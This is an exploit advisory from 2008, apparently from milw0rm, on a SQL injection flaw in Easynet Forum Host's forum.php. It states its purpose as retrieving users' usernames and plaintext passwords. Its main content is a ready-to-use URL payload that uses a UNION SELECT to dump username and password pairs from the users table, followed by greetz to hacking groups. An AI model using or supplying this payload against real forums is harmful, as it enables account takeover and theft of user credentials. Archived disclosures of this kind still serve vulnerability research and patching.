Easynet Forum Host forum.php forum SQL Injection Vulnerability.pdf

1 −−==+================================================================================+==−− 2 −−==+ Easynet Forum Host SQL Injection Vulnerbilitys +==−− 3 −−==+================================================================================+==−− 4 5 6 7 Discovered By: t0pP8uZz & xprog 8 Discovered On: 5 April 2008 9 SCRIPT DOWNLOAD: N/A 10 11 12 SITE: http://www.easynet4u.com/forum 13 14 15 DORK: N/A 16 17 DESCRIPTION: retrive users username and plaintext password. 18 19 EXPLOITS: 20 21 EXPLOIT 1: http://www.server.com/SCRIPT_PATH/forum.php?forum=−1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x 3a,password),5,6/**/FROM/**/users/* 22 23 24 GREETZ: milw0rm.com, H4CK−Y0u.org, CipherCrew! 25 26 27 28 −−==+================================================================================+==−− 29 −−==+ Easynet Forum Host SQL Injection Vulnerbilitys +==−− 30 −−==+================================================================================+==−− 31 32 # milw0rm.com [2008−04−05] Page 1/1 Easynet Forum Host forum.php forum SQL Injection Vulnerability t0pP8uZz 04/05/2008